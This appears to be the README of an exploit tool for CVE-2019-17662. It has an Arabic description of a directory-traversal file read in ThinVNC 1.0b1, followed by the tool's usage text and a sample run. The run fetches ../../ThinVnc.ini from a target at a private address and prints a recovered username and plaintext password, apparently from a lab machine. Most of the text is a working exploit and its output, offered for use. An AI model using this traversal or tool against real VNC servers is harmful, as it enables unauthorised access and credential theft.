
استغلال لـ CVE-2019-17662
ThinVNC 1.0b1 معرّض لثغرة قراءة ملفات تعسفية، مما يؤدي إلى اختراق خادم VNC. تظل الثغرة قائمة حتى عند تفعيل المصادقة أثناء نشر خادم VNC. تُخزَّن كلمة مرور المصادقة كنص واضح في ملف يمكن قراءته عبر ناقل هجوم اجتياز الدليل ../../ThinVnc.ini.
~ NIST
$ ./bin/CVE-2019-17662 -h
[~] Usage: ./CVE-2019-17662 -u URL [-f File]
[>] Options:
OPTIONS Desciption
-u URL Base URL
-f File [Optional] File Name To Query (Default: ThinVnc.ini)
$ ./bin/CVE-2019-17662 -u http://10.10.185.214:8080/
[+] CVE-2019-17662 exploit by @whokilleddb
[o] Target : http://10.10.185.214:8080/
[x] File To Read: ThinVnc.ini
[~] Trying to Read: http://10.10.185.214:8080/abc/../../ThinVnc.ini
[:] Trying To Fetch Credentials
[-] User=Atlas
[-] Password=H0ldUpTheHe@vens